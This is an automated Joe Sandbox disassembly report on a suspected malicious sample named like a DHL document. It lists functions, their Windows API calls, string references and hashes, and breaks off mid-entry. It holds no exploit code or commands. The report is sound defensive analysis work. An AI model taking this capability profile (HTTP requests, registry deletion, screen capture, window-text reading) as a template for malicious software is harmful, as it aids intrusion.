Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 37a33e5abf199593414185ea8422b388ffad7efba22d628732605da8920e05a4
Instruction ID: 1af12c3d673b1b983cc5350e35e3a6d32613947ac44c592da7cce824f3351053
Opcode Fuzzy Hash: 37a33e5abf199593414185ea8422b388ffad7efba22d628732605da8920e05a4
Instruction Fuzzy Hash: 2EF19B315042409FC715EF25C891BABBBE5EF85314F14855EF8899B2A2CB38EC44CB96

Function 003F326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(004C1990), ref: 00432F8D
GetMenuItemCount.USER32(004C1990), ref: 0043303D
GetCursorPos.USER32(?), ref: 00433081
SetForegroundWindow.USER32(00000000), ref: 0043308A
TrackPopupMenuEx.USER32(004C1990,00000000,?,00000000,00000000,00000000), ref: 0043309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004330A9

Strings

0, xrefs: 003F327D

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 923de134647903d376f248aa5b625946dbd8fc3a4e664623e55e7b3bf5e2a8af
Instruction ID: 790bc4b8949cf919f172c53be374ab743087996417ec14102c960572519acd8c
Opcode Fuzzy Hash: 923de134647903d376f248aa5b625946dbd8fc3a4e664623e55e7b3bf5e2a8af
Instruction Fuzzy Hash: A1711B30640215BEEB259F25CD89FAFBF64FF05364F204217F614662E1C7B5A910DB98

Function 00486CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00486DEB

Part of subcall function 003F6B57: _wcslen.LIBCMT ref: 003F6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00486E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00486E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00486E94
DestroyWindow.USER32(?), ref: 00486EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,003F0000,00000000), ref: 00486EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00486EFD
GetDesktopWindow.USER32 ref: 00486F16
GetWindowRect.USER32(00000000), ref: 00486F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00486F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00486F4D

Part of subcall function 00409944: GetWindowLongW.USER32(?,000000EB), ref: 00409952

Strings

tooltips_class32, xrefs: 00486E58, 00486EDD
0, xrefs: 00486D98

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 581f9d49fb2b03deef33777bd2574fc0136a1ffc379dfa9aaf3b224e396f35a4
Instruction ID: f63ad76f83c3ae4f629a091c1fe34e9af3b0f3fb2a73dcedcc98976084c7f895
Opcode Fuzzy Hash: 581f9d49fb2b03deef33777bd2574fc0136a1ffc379dfa9aaf3b224e396f35a4
Instruction Fuzzy Hash: 9E715B74104244AFDB61DF18D848FBBBBE9FB89304F14082EFA8997261D774E905CB29

Function 0046C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0046C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0046C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0046C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0046C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0046C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0046C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0046C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0046C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0046C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0046C5F0
InternetCloseHandle.WININET(00000000), ref: 0046C5FB

Strings

, xrefs: 0046C575

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 4f6d69250b9a7a4bb3e6b1d5c2bea78fe964523ae783b9480366dd434ca855f3
Instruction ID: 4bfb902cb3bba7b8e87fdf5d3c32576428c75e43aa313e624adfa18d7b0ebd26
Opcode Fuzzy Hash: 4f6d69250b9a7a4bb3e6b1d5c2bea78fe964523ae783b9480366dd434ca855f3
Instruction Fuzzy Hash: 6A5130B1500205BFDB219F65CDC8ABB7BBCFB04754F00442EF98696650EB38E9449B6A

Function 0048856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00488592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004885A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004885AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004885BA
GlobalLock.KERNEL32(00000000), ref: 004885C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004885D7
GlobalUnlock.KERNEL32(00000000), ref: 004885E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004885E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004885F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0048FC38,?), ref: 00488611
GlobalFree.KERNEL32(00000000), ref: 00488621
GetObjectW.GDI32(?,00000018,?), ref: 00488641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00488671
DeleteObject.GDI32(?), ref: 00488699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004886AF

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: eb549dfc1ad53cc37aa46d7069b7f4794d7f9a9365acc5df1890d3dd53a7126e
Instruction ID: 0aa68d59621e6fd308911668f8624ebbcaa6517ec47231c89ee5ad573e867e2c
Opcode Fuzzy Hash: eb549dfc1ad53cc37aa46d7069b7f4794d7f9a9365acc5df1890d3dd53a7126e
Instruction Fuzzy Hash: 31410975600208AFDB119FA5DC88EAF7BB9EF89B11F10486DF905E7260DB349901DB64

Function 004614BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00461502
VariantCopy.OLEAUT32(?,?), ref: 0046150B
VariantClear.OLEAUT32(?), ref: 00461517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004615FB
VarR8FromDec.OLEAUT32(?,?), ref: 00461657
VariantInit.OLEAUT32(?), ref: 00461708
SysFreeString.OLEAUT32(?), ref: 0046178C
VariantClear.OLEAUT32(?), ref: 004617D8
VariantClear.OLEAUT32(?), ref: 004617E7
VariantInit.OLEAUT32(00000000), ref: 00461823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00461625
Default, xrefs: 004616AF

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 41e280bc0b09b031e862257c7f925a74642627c45384e70c2fdbfa31f49e104d
Instruction ID: accdc237d4657eb069f351c6ced8919dbe770439af802637189d647260ae1b85
Opcode Fuzzy Hash: 41e280bc0b09b031e862257c7f925a74642627c45384e70c2fdbfa31f49e104d
Instruction Fuzzy Hash: F4D1DE71A00205EBDB109F65D884B7AF7B5BF44700F18846BE407AB2A0EB38D845DB6B

Function 0047B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

Part of subcall function 0047C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047B6AE,?,?), ref: 0047C9B5
Part of subcall function 0047C998: _wcslen.LIBCMT ref: 0047C9F1
Part of subcall function 0047C998: _wcslen.LIBCMT ref: 0047CA68
Part of subcall function 0047C998: _wcslen.LIBCMT ref: 0047CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0047B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0047B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0047B80A
RegCloseKey.ADVAPI32(?), ref: 0047B87E
RegCloseKey.ADVAPI32(?), ref: 0047B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0047B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0047B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0047B922
FreeLibrary.KERNEL32(00000000), ref: 0047B983
RegCloseKey.ADVAPI32(00000000), ref: 0047B994

Strings

RegDeleteKeyExW, xrefs: 0047B8FE
advapi32.dll, xrefs: 0047B8ED

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: c9200dd818bd19dc5071706ca43cccb1441c50699525e8fa6100e0e847280a08
Instruction ID: 218b47cb049260da9ea32acdcd5d692a3f09cd160b3b7e2f9cec2808d59cfb60
Opcode Fuzzy Hash: c9200dd818bd19dc5071706ca43cccb1441c50699525e8fa6100e0e847280a08
Instruction Fuzzy Hash: 87C18A70204201AFD715DF24C495F6ABBE5FF84308F14C49DE5AA8B3A2CB75E845CB96

Function 0047255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004725D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004725E8
CreateCompatibleDC.GDI32(?), ref: 004725F4
SelectObject.GDI32(00000000,?), ref: 00472601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0047266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 004726AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 004726D0
SelectObject.GDI32(?,?), ref: 004726D8
DeleteObject.GDI32(?), ref: 004726E1
DeleteDC.GDI32(?), ref: 004726E8
ReleaseDC.USER32(00000000,?), ref: 004726F3

Strings

(, xrefs: 0047268D

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 255e8eb5e98e7aa04b78e82aded7f17845b227111a882e28403608d539bf72d1
Instruction ID: e7d61e7dd733fc17fd61df119f419e9c388f969b69e005b856f26453acb11f16
Opcode Fuzzy Hash: 255e8eb5e98e7aa04b78e82aded7f17845b227111a882e28403608d539bf72d1
Instruction Fuzzy Hash: D561E475D00219EFCF14CFA4D984AAEBBB5FF48310F20852EE959A7250E774A941CFA4

Function 0042DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0042DAA1

Part of subcall function 0042D63C: _free.LIBCMT ref: 0042D659
Part of subcall function 0042D63C: _free.LIBCMT ref: 0042D66B
Part of subcall function 0042D63C: _free.LIBCMT ref: 0042D67D
Part of subcall function 0042D63C: _free.LIBCMT ref: 0042D68F
Part of subcall function 0042D63C: _free.LIBCMT ref: 0042D6A1
Part of subcall function 0042D63C: _free.LIBCMT ref: 0042D6B3
Part of subcall function 0042D63C: _free.LIBCMT ref: 0042D6C5
Part of subcall function 0042D63C: _free.LIBCMT ref: 0042D6D7
Part of subcall function 0042D63C: _free.LIBCMT ref: 0042D6E9
Part of subcall function 0042D63C: _free.LIBCMT ref: 0042D6FB
Part of subcall function 0042D63C: _free.LIBCMT ref: 0042D70D
Part of subcall function 0042D63C: _free.LIBCMT ref: 0042D71F
Part of subcall function 0042D63C: _free.LIBCMT ref: 0042D731

_free.LIBCMT ref: 0042DA96

Part of subcall function 004229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042D7D1,00000000,00000000,00000000,00000000,?,0042D7F8,00000000,00000007,00000000,?,0042DBF5,00000000), ref: 004229DE
Part of subcall function 004229C8: GetLastError.KERNEL32(00000000,?,0042D7D1,00000000,00000000,00000000,00000000,?,0042D7F8,00000000,00000007,00000000,?,0042DBF5,00000000,00000000), ref: 004229F0

_free.LIBCMT ref: 0042DAB8
_free.LIBCMT ref: 0042DACD
_free.LIBCMT ref: 0042DAD8
_free.LIBCMT ref: 0042DAFA
_free.LIBCMT ref: 0042DB0D
_free.LIBCMT ref: 0042DB1B
_free.LIBCMT ref: 0042DB26
_free.LIBCMT ref: 0042DB5E
_free.LIBCMT ref: 0042DB65
_free.LIBCMT ref: 0042DB82
_free.LIBCMT ref: 0042DB9A

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 42914d15875655abcc3de14d65927093ca53d607e5bf383679f5f0a1481fdcea
Instruction ID: 8c6538349f1c1df214072464867c5d11e0170f903ba1a5be16ba73d058879983
Opcode Fuzzy Hash: 42914d15875655abcc3de14d65927093ca53d607e5bf383679f5f0a1481fdcea
Instruction Fuzzy Hash: EF314CB1B04224AFDB21AB3AF945B577BE9FF04315FD1442BE449D7291DA78AC808728

Function 0045365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0045369C
_wcslen.LIBCMT ref: 004536A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00453797
GetClassNameW.USER32(?,?,00000400), ref: 0045380C
GetDlgCtrlID.USER32(?), ref: 0045385D
GetWindowRect.USER32(?,?), ref: 00453882
GetParent.USER32(?), ref: 004538A0
ScreenToClient.USER32(00000000), ref: 004538A7
GetClassNameW.USER32(?,?,00000100), ref: 00453921
GetWindowTextW.USER32(?,?,00000400), ref: 0045395D

Strings

%s%u, xrefs: 00453734

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 424587d375a48a75b045af7a0a442cf2bbcf831bd452d77218954b645ddc5837
Instruction ID: abd9ee5345c8a818c5140debdf3aade02df6db6b4d0bf682e42abd3070429a9d
Opcode Fuzzy Hash: 424587d375a48a75b045af7a0a442cf2bbcf831bd452d77218954b645ddc5837
Instruction Fuzzy Hash: 9F91D5B1204206AFD719DF24C884BEAF7A8FF44386F00452EFD95D2251D734EA49CB95

Function 00454954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00454994
GetWindowTextW.USER32(?,?,00000400), ref: 004549DA
_wcslen.LIBCMT ref: 004549EB
CharUpperBuffW.USER32(?,00000000), ref: 004549F7
_wcsstr.LIBVCRUNTIME ref: 00454A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00454A64
GetWindowTextW.USER32(?,?,00000400), ref: 00454A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00454AE6
GetClassNameW.USER32(?,?,00000400), ref: 00454B20
GetWindowRect.USER32(?,?), ref: 00454B8B

Strings

ThumbnailClass, xrefs: 00454A6F, 00454AF1

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 42b041abc17471a626d145d4a0b6ad7e787da01a2f8eb8804a2c8504be51a685
Instruction ID: ecee6e1e79dac2bd9c8fa0e0af9f7954bafdb22244ef5df6c89adfe6976f0b63
Opcode Fuzzy Hash: 42b041abc17471a626d145d4a0b6ad7e787da01a2f8eb8804a2c8504be51a685
Instruction Fuzzy Hash: 3291A0710042059BDB05CF14C985BAB77E8EF84319F04446EFD859A296EB38ED89CB69

Function 00488D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00409BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00409BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00488D5A
GetFocus.USER32 ref: 00488D6A
GetDlgCtrlID.USER32(00000000), ref: 00488D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00488E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00488ECF
GetMenuItemCount.USER32(?), ref: 00488EEC
GetMenuItemID.USER32(?,00000000), ref: 00488EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00488F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00488F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00488FA1

Strings

0, xrefs: 00488E9F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 080a2ebdb017566a6d718bc726bb70a669b81d70f42715fd44134a7687629fda
Instruction ID: 62ac0bc090f299f64b49315ac2f1558ee830f42d2703028eaeb9ff3db25993e4
Opcode Fuzzy Hash: 080a2ebdb017566a6d718bc726bb70a669b81d70f42715fd44134a7687629fda
Instruction Fuzzy Hash: 56819F71504311ABDB10EF14D884A6F77E9FB88314F540D2EFA84D7291DB38D901CB69

Function 0045DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0045DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0045DC46
_wcslen.LIBCMT ref: 0045DC50
_wcsstr.LIBVCRUNTIME ref: 0045DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0045DCBC

Strings

04090000, xrefs: 0045DCF2
%u.%u.%u.%u, xrefs: 0045DD9A
DefaultLangCodepage, xrefs: 0045DD1F
StringFileInfo\, xrefs: 0045DC8F
\VarFileInfo\Translation, xrefs: 0045DCB4

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 3146c14a678e3ed3639f41516cb5bc18a62b9a836c4a587262be86a057bf157e
Instruction ID: e3ac98ce9b509e6e40854a48a3b3c8197b874d489fcb4a0a4fc5f31af598b901
Opcode Fuzzy Hash: 3146c14a678e3ed3639f41516cb5bc18a62b9a836c4a587262be86a057bf157e
Instruction Fuzzy Hash: C64102729402057ADB20A665DC43EFF776CEF45714F20046FF900A6183EA7C9A4987BD

Function 0047CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0047CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0047CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0047CD48

Part of subcall function 0047CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0047CCAA
Part of subcall function 0047CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0047CCBD
Part of subcall function 0047CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0047CCCF
Part of subcall function 0047CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0047CD05
